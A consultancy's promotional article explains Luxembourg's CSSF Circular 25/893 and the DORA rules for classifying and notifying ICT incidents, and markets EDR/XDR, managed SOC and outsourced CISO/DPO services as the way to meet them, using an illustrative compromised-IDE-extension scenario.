CSSF — Circular 25/893: tightened ICT alerting and reporting under DORA

On 17 March 2026, the CSSF reiterated the DORA information register collection and the entry into application of Circular 25/893 on the classification and notification of ICT incidents and significant cyber threats. Here is how an EDR/XDR stack enables immediate compliance.

Key facts

On 17 March 2026, the CSSF updated the DORA “information register collection” and restated the obligation to notify ICT incidents via its eDesk portal, following CSSF Circular 25/893 that entered into force at end‑2025. The circular requires DORA‑covered financial entities to classify and notify major ICT‑related incidents and, on a voluntary basis, significant cyber threats, using forms and deadlines harmonized by European technical standards (ITS/RTS). Payment service providers not covered by DORA are explicitly subject to aligned classification and notification requirements. The CSSF also clarifies the practical setup (role “DORA Reporting”, submissions via eDesk, regular updates of the ICT dependencies register) and tightens operational expectations around detection and incident escalation.

CSSF sources: update “DORA – Information register collection” dated 17/03/2026 (cssf.lu) and CSSF Circular 25/893 (PDF) (cssf.lu), complemented by the eDesk opening notice of 11/02/2026 (cssf.lu).

Why this matters now: attacks keep accelerating. In May 2026, GitHub confirmed roughly 3,800 internal repositories were compromised via a booby‑trapped VS Code extension — another case of fast‑moving compromise that demands near real‑time detection and notification. (BleepingComputer)

The applicable legal framework

Regulation (EU) 2022/2554 (DORA) governs ICT incident management:

• Arts. 17–18: management process and classification criteria (major incidents, cyber threats).
• Art. 19: notification of major incidents and voluntary notification of significant cyber threats (templates and deadlines harmonized by ITS/RTS). See EUR‑Lex and a concise reminder of Art. 19 (Better Regulation).
• Arts. 20–21: standardized content and centralized reporting.

CSSF Circular 25/893 tightens operationalization in Luxembourg: it details classification and reporting for DORA entities and aligns requirements for certain non‑DORA PSPs (notification framework, eDesk channels, scope and definitions). It also reiterates the link with the information register (Art. 28 DORA) collected via eDesk, with the 2026 window formalized by the CSSF. For a practical reminder of the DORA framework from Luxgap, see key DORA concepts. References: Circular 25/893 (PDF), eDesk notice 11/02/2026, and thematic page “ICT and cyber risk – DORA entities” (cssf.lu).

The technical solution to deploy

EDR/XDR — endpoint and infrastructure detection and response — is the enabling block that makes CSSF/DORA compliance practicable:

• What it achieves: early identification of abnormal behaviors (exfiltration, malicious execution, lateral movement), automatic containment (network isolation, executable blocking), and preservation of forensic artifacts to classify the incident and document the initial/interim/final report.
• How it works: EDR agents on workstations/servers, sensors on cloud workloads, aggregation of network/identity/SaaS telemetry into a correlated XDR platform. SIEM/SOAR integrations to feed eDesk within deadlines.
• Concrete controls:
  • Detection (DORA Art. 10 and ISO/IEC 27001:2022 Annex A.5.28, A.8.16): behavioral rules, exploit/certutil/PowerShell detection, exfiltration tagging.
  • Response and recovery (DORA Art. 11): automatic containment, eradication playbooks, remediation verification.
  • Logging and evidence (ISO 27001 A.5.10, A.8.15; NIST CSF 2.0 DE.AE, RS.AN): trustworthy timestamps, retention, hashing, chain of custody for CSSF reports.
  • Classification/Reporting (DORA Arts. 18–20): dashboards mapped to ITS/RTS thresholds (impacts, downtime, customers affected), export of structured metadata to eDesk.

In practice, a well‑integrated EDR/XDR stack with SIEM and SOAR produces what Circular 25/893 requires in hours rather than days: timeline, impact indicators, scope of affected systems, and corrective actions applied.

How Luxgap delivers this

• Our 24/7 managed SOC: onboarding of logs and EDR/XDR telemetry, real‑time correlation, proactive hunting, and escalation playbooks aligned to DORA milestones (initial notification, interim and final reports). We prepare eDesk exports and validate classification with your CISO/DPO before submission. Explore our managed SOC approach to EDR/XDR.
• Our ISO 27001 governance: scoping of logging policies, retention periods, evidence model (hash/timestamp), and documented incident handling procedures — essential to meet CSSF post‑incident requests.
• Our outsourced DPO and CISO consultants: crisis cell facilitation, DORA Arts. 18/19 qualification, GDPR coherence (Art. 33 to CNPD if personal data is affected), and coordination of multiple notifications (CSSF/CSIRT/CNPD as needed). For leadership, we provide an outsourced CISO alongside your team.

Concrete case in Luxembourg or the EU

Realistic example: a DORA‑regulated management company with multiple ICT providers faces early exfiltration via a compromised IDE extension. Thanks to EDR, the malicious executor is detected by behavioral rule (abnormal curl execution and artifact packaging). Our SOC isolates hosts, consolidates telemetry (process tree, outbound connections), assesses impact (no critical function downtime, no client data reached), and qualifies the event. Outcome:

• Structured initial notification via eDesk within ITS deadlines,
• Interim report at 24–72h with IOCs/measures,
• Final report with root‑cause analysis, control hardening, and information register (Art. 28) update

— all driven by solid EDR/XDR evidence retained under ISO 27001.

First concrete steps

1. Map your DORA‑critical functions to XDR detection use cases (unavailability, degradation, data impact) to accelerate Art. 18 classification.
2. Enable EDR on 100% of critical assets (workstations, servers, cloud workloads) and validate SIEM/SOAR integrations. Test automatic isolation on a pilot perimeter.
3. Set up eDesk templates (ITS/RTS) with your CISO/Compliance: who drafts what, by when, and how to extract impact metrics from XDR.
4. Update the information register (Art. 28) and assign a “DORA Reporting” role holder in the CSSF eDesk with a backup.
5. Run a table‑top exercise “developer compromise/IDE extension” to rehearse detect‑>classify‑>notify‑>remediate within 48h.

Official sources

• CSSF — Circular 25/893 (PDF)
• CSSF — DORA, information register collection (17 March 2026)
• CSSF — eDesk “DORA Reporting” open as of 11 February 2026
• EUR‑Lex — Regulation (EU) 2022/2554 (DORA) and Art. 19 — ICT incident notification
• BleepingComputer — GitHub confirms breach (~3,800 repos), 20 May 2026